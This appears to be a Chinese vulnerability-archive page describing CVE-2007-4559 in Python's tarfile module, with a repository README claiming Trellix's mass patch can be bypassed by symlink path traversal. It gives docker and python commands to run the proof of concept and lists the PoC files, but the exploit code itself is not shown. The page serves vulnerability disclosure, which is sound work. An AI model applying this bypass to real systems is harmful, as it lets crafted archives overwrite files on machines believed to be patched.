关联漏洞
标题:
Python tarfile 模块路径遍历漏洞
(CVE-2007-4559)
描述:Python是Python基金会的一套开源的、面向对象的程序设计语言。该语言具有可扩展、支持模块和包、支持多种平台等特点。 Python tarfile模块中的(1)extract和(2)extractall函数存在路径遍历漏洞,该漏洞允许用户辅助远程攻击者通过..TAR存档文件中文件名中的(dot dot)序列,该漏洞与CVE-2001-1267相关。
描述
Bypass for CVE-2007-4559 Trellix patch
介绍
# trellix-tarslip-patch-bypass
In 2023, Trellix announced [1] that they patched +61,000 open-source projects for [CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559), an old path traversal vulnerability. Analyzing their patch, it's easy to notice that it can be bypassed using a symlink.
Symlink path traversal is an old technique, and it has also been shown in LiveOverflow's video [ Critical .zip vulnerabilities? - Zip Slip and ZipperDown](https://www.youtube.com/watch?v=Ry_yb5Oipq0).
[1] [Trellix Advanced Research Center Patches 61,000 Vulnerable Open-Source Projects](https://www.trellix.com/blogs/research/trellix-advanced-research-center-patches-vulnerable-open-source-projects/)
### PoC
```
docker build -t tarslip .
docker run -it tarslip bash
python poc.py
cat evil.txt
```
文件快照
[4.0K] /data/pocs/4b06d88876c026fa96dde9348f1cb1211233583b
├── [ 160] bypass.tar.gz
├── [ 51] Dockerfile
├── [1.1K] poc.py
└── [ 803] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。